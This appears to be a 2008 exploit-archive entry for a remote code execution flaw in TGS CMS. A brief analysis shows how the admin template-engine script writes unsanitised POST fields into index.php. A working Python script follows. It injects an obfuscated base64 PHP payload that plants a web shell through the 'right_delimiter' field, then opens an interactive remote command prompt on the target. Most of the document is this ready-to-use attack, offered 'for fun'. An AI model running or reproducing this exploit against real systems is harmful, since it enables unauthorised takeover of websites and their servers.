Home / exploits tgscms-exec.txt
Posted on 04 August 2008
# TGS CMS Remote Code Execution Exploit # by 0in # from Dark-Coders Group! # www.dark-coders.pl # Contact: 0in(dot)email[at]gmail(dot)com # Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke # Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot # Let's analyze the vuln: # We've got the: /cms/admin/admin.template_engine.php # first line:"<?" # next 2-22 lines - comments # 23: if ($_GET['option'] == "set_template") { # 24: $filename = "../index.php"; # 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) { # From 50 line to 88 we have definition of file content # 50: $content = '<?php // here programmer define the file to save in "../index.php" # but... # he.. don't think xD # 77:$tgs_template->template_dir = "'.$_POST['template_dir'].'"; # 78:$tgs_template->config_dir = "'.$_POST['config_dir'].'"; # 79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'"; # 80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'"; # 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'"; # And.. boom! # 89: if (@fwrite($handle,$content)) { # Just simply exploit for fun: import httplib import urllib print "TGS CMS Remote Code Execution Exploit" print "by 0in From Dark-Coders Group" print "www.dark-coders.pl" print 'Enter target:' target=raw_input() print 'Enter path:' path=raw_input() inject="";error_reporting(0);eval(base64_decode("JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7"));//" exploit=httplib.HTTPConnection(target+':80') headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"} data=urllib.urlencode({'right_delimiter':inject}) exploit.request("POST",path+"/cms/admin/admin.template_engine.php?option=set_template",data,headers) print exploit.getresponse().read() while(1): cmd=raw_input("[shell@"+target+"]#") if(cmd=='exit'): quit() shell=httplib.HTTPConnection(target+':80') shell.request("GET",path+"/cms/index.php?zuo="+cmd) print shell.getresponse().read()
